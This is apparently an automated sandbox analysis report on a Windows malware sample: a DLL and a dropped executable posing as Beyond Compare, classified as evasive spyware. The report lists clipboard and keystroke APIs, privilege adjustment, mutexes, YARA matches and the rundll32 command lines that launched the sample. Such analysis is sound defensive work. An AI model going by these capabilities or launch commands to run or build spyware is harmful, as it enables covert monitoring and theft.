Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.totalcmd.net/directory/packer.html
Source: rundll32.exe, 00000013.00000002.1962876857.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, T8TY28UxiT.dll	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://fontawesome.com
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://fontawesome.com/license/free
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://github.com/Yaffle/EventSource/
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://github.com/muaz-khan/RTCMultiConnection
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://github.com/muaz-khan/RTCMultiConnection/issues/778#issuecomment-524853468
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://github.com/muaz-khan/RecordRTC

Contains functionality for read data from the clipboard

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05468CD6 OpenClipboard,

28_2_05468CD6

Contains functionality to modify clipboard data

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05468DF6 SetClipboardData,

28_2_05468DF6

Contains functionality to read the clipboard data

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05468956 GetClipboardData,

28_2_05468956

Contains functionality to retrieve information about pressed keystrokes

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05468926 GetAsyncKeyState,

28_2_05468926

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_054687C6 CreateDesktopW,

28_2_054687C6

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\System32\loaddll32.exe	Memory allocated: 76D80000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 775A0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 775A0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 775A0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 775A0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 775A0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 775A0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 775A0000 page execute and read and write	Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C832910 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,	12_2_6C832910
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7F4430 NtCancelIoFileEx,NtDeviceIoControlFile,RtlNtStatusToDosError,NtCancelIoFileEx,RtlNtStatusToDosError,RtlNtStatusToDosError,	12_2_6C7F4430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C8327F0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,	12_2_6C8327F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C828701 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,	12_2_6C828701
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7F5E50 NtCancelIoFileEx,RtlNtStatusToDosError,	12_2_6C7F5E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7F7920 NtCancelIoFileEx,RtlNtStatusToDosError,	12_2_6C7F7920
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7F3B50 NtCancelIoFileEx,RtlNtStatusToDosError,	12_2_6C7F3B50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7F72C0 NtCancelIoFileEx,RtlNtStatusToDosError,	12_2_6C7F72C0

Contains functionality to communicate with device drivers

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C7F4430: NtCancelIoFileEx,NtDeviceIoControlFile,RtlNtStatusToDosError,NtCancelIoFileEx,RtlNtStatusToDosError,RtlNtStatusToDosError,

12_2_6C7F4430

Detected potential crypto function

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6C45F6	12_2_6C6C45F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6927E0	12_2_6C6927E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C833DBB	12_2_6C833DBB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6979E0	12_2_6C6979E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6A3B80	12_2_6C6A3B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C699600	12_2_6C699600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6933D2	12_2_6C6933D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6A8CC0	12_2_6C6A8CC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7D0D10	12_2_6C7D0D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C818DF0	12_2_6C818DF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C82CD50	12_2_6C82CD50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C84CEF0	12_2_6C84CEF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C844E00	12_2_6C844E00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6A8F10	12_2_6C6A8F10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C818880	12_2_6C818880
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6AE800	12_2_6C6AE800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C8308F0	12_2_6C8308F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C84C910	12_2_6C84C910
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C69C980	12_2_6C69C980
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C69EA50	12_2_6C69EA50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6B0B40	12_2_6C6B0B40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C818B70	12_2_6C818B70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C858470	12_2_6C858470
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C85A590	12_2_6C85A590
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6A8550	12_2_6C6A8550
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6E0500	12_2_6C6E0500
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C82A511	12_2_6C82A511
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C82E51E	12_2_6C82E51E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7765A0	12_2_6C7765A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C69C630	12_2_6C69C630
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7C4600	12_2_6C7C4600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C80C610	12_2_6C80C610
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6B06C0	12_2_6C6B06C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C8507C0	12_2_6C8507C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C8467E0	12_2_6C8467E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6A8710	12_2_6C6A8710
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C85C0E0	12_2_6C85C0E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7840F0	12_2_6C7840F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C80A180	12_2_6C80A180
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6E0140	12_2_6C6E0140
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7481A0	12_2_6C7481A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7DC190	12_2_6C7DC190
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C80C170	12_2_6C80C170
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C71A216	12_2_6C71A216
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7E2210	12_2_6C7E2210
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6B02E0	12_2_6C6B02E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C818220	12_2_6C818220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C850240	12_2_6C850240
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C84A3A0	12_2_6C84A3A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C747C60	12_2_6C747C60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C847C91	12_2_6C847C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C83BC40	12_2_6C83BC40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7E9CB0	12_2_6C7E9CB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C781D60	12_2_6C781D60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7E7DB0	12_2_6C7E7DB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7E3E60	12_2_6C7E3E60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6DFE20	12_2_6C6DFE20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C80BE00	12_2_6C80BE00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C857E00	12_2_6C857E00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6B7F40	12_2_6C6B7F40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C855FC0	12_2_6C855FC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C747F00	12_2_6C747F00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6A9F80	12_2_6C6A9F80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C817880	12_2_6C817880
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7A1830	12_2_6C7A1830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C8578F0	12_2_6C8578F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7E78D0	12_2_6C7E78D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6A7920	12_2_6C6A7920
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6AB910	12_2_6C6AB910
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C799AD0	12_2_6C799AD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C839A30	12_2_6C839A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C855B9C	12_2_6C855B9C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7E7B50	12_2_6C7E7B50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C73DB00	12_2_6C73DB00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C84DB17	12_2_6C84DB17
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C809480	12_2_6C809480
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C819480	12_2_6C819480
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6A9560	12_2_6C6A9560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C8055E0	12_2_6C8055E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C819670	12_2_6C819670
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C83B7A0	12_2_6C83B7A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C8597F0	12_2_6C8597F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C805080	12_2_6C805080
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7810C0	12_2_6C7810C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C8191D0	12_2_6C8191D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C69D180	12_2_6C69D180
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C84F2F0	12_2_6C84F2F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C859250	12_2_6C859250
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C847370	12_2_6C847370
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE44FF0	28_2_6FE44FF0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE56750	28_2_6FE56750
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE49650	28_2_6FE49650
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE58D30	28_2_6FE58D30
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE504C0	28_2_6FE504C0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE4F480	28_2_6FE4F480
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE45400	28_2_6FE45400
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE583E0	28_2_6FE583E0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE543C0	28_2_6FE543C0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE503A4	28_2_6FE503A4
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE50BA0	28_2_6FE50BA0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE44BB0	28_2_6FE44BB0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE50380	28_2_6FE50380
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE44B20	28_2_6FE44B20
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE58A20	28_2_6FE58A20
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE50200	28_2_6FE50200
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE411E0	28_2_6FE411E0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE578E0	28_2_6FE578E0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE598E0	28_2_6FE598E0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE4E87E	28_2_6FE4E87E
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE45850	28_2_6FE45850
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE5D85C	28_2_6FE5D85C
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_0545DB30	28_2_0545DB30
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A94EB8	28_2_06A94EB8
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06AD560C	28_2_06AD560C
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06ACA410	28_2_06ACA410
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06AF9460	28_2_06AF9460
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A6C5B8	28_2_06A6C5B8
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A63514	28_2_06A63514
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06AC43A4	28_2_06AC43A4
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A6C304	28_2_06A6C304
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06B07374	28_2_06B07374
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A7A0C8	28_2_06A7A0C8
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06AE41E0	28_2_06AE41E0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A65EA8	28_2_06A65EA8
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A6BEC4	28_2_06A6BEC4
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A67CB4	28_2_06A67CB4
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06AE3A2C	28_2_06AE3A2C
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06AC6A48	28_2_06AC6A48
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A69BBC	28_2_06A69BBC
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A84B8C	28_2_06A84B8C
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A95B10	28_2_06A95B10
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06A7A828	28_2_06A7A828
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06AE4844	28_2_06AE4844
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_06B03924	28_2_06B03924
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E3D134	28_2_05E3D134
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E299D0	28_2_05E299D0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E261A8	28_2_05E261A8
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E081BA	28_2_05E081BA
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E3E16C	28_2_05E3E16C
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E19900	28_2_05E19900
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E080A4	28_2_05E080A4
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E0A854	28_2_05E0A854
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E0A3C4	28_2_05E0A3C4
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E0A768	28_2_05E0A768
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E24B74	28_2_05E24B74
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E0AB08	28_2_05E0AB08
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E15A78	28_2_05E15A78
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E2FA7C	28_2_05E2FA7C
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E3A31C	28_2_05E3A31C
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05E3B660	28_2_05E3B660

Found potential string decryption / allocating functions

Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: String function: 06A96AF8 appears 34 times
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: String function: 6FE5DE20 appears 37 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6C85CB80 appears 160 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6C85C940 appears 156 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6C85C830 appears 212 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6C84B7E0 appears 49 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6C849ED0 appears 31 times

One or more processes crash

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7620 -s 616

Uses 32bit PE files

Source: T8TY28UxiT.dll

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL

Source: T8TY28UxiT.dll	Binary string: Afdfd\Device\Afd\Mio
Source: T8TY28UxiT.dll	Binary string: Failed to open \Device\Afd\Mio: 8

Source: ybtrrus.exe, 00000021.00000002.2650668938.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NumberCaseSig Value="False"/>.frm;.vb;*.vbp;.vbs"/>
Source: ybtrrus.exe, 0000001C.00000002.2653315436.0000000002A19000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2653795251.0000000002B19000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: .bas;.cls;.ctl;.frm;.vb;.vbp;*.vbs
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: <Mask Value=".bas;.cls;.ctl;.frm;.vb;.vbp;*.vbs"/>
Source: ybtrrus.exe, 0000001C.00000002.2653315436.0000000002A19000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2653795251.0000000002B19000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: (.bas;.cls;.ctl;.frm;.vb;.vbp;*.vbs@

Source: classification engine

Classification label: mal96.spyw.evad.winDLL@66/45@0/8

Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE48830 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,		28_2_6FE48830
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05467AAE AdjustTokenPrivileges,		28_2_05467AAE

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05467D56 GetDiskFreeSpaceW,

28_2_05467D56

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05467CFE FreeResource,

28_2_05467CFE

Source: C:\iDQiPwFWUp\ybtrrus.exe

File created: C:\Users\user\AppData\Roaming\Scooter Software

Source: C:\iDQiPwFWUp\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\BeyondCompare3
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_03
Source: C:\iDQiPwFWUp\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_7732
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
Source: C:\iDQiPwFWUp\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\madToolsMsgHandlerMutex$1c9c$432c4c
Source: C:\iDQiPwFWUp\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_7292
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7204
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
Source: C:\iDQiPwFWUp\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$1e34
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7620
Source: C:\pnVcakKiqh\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$1d78
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7604
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7208
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7924
Source: C:\iDQiPwFWUp\ybtrrus.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8036
Source: C:\pnVcakKiqh\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\madToolsMsgHandlerMutex$1d88$432c4c
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7188
Source: C:\pnVcakKiqh\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_7544
Source: C:\iDQiPwFWUp\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\BeyondCompare3
Source: C:\iDQiPwFWUp\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$1c7c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
Source: C:\iDQiPwFWUp\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\Beyond Compare: BE887BC7-16B2-48B5-B618-B3A52A26EC10
Source: C:\iDQiPwFWUp\ybtrrus.exe	Mutant created: \Sessions\1\BaseNamedObjects\madToolsMsgHandlerMutex$1e9c$432c4c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\e1a9ee5b-b3ff-45ea-9647-c8dc25e5e75d

Jump to behavior

Source: Yara match	File source: 28.0.ybtrrus.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY

Source: T8TY28UxiT.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\iDQiPwFWUp\ybtrrus.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\iDQiPwFWUp\ybtrrus.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\pnVcakKiqh\ybtrrus.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\pnVcakKiqh\ybtrrus.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\iDQiPwFWUp\ybtrrus.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\iDQiPwFWUp\ybtrrus.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\iDQiPwFWUp\ybtrrus.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,DllMain

Source: T8TY28UxiT.dll

ReversingLabs: Detection: 15%

Source: ybtrrus.exe	String found in binary or memory: NATS-DANO-ADD
Source: ybtrrus.exe	String found in binary or memory: NATS-SEFI-ADD

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,DllMain
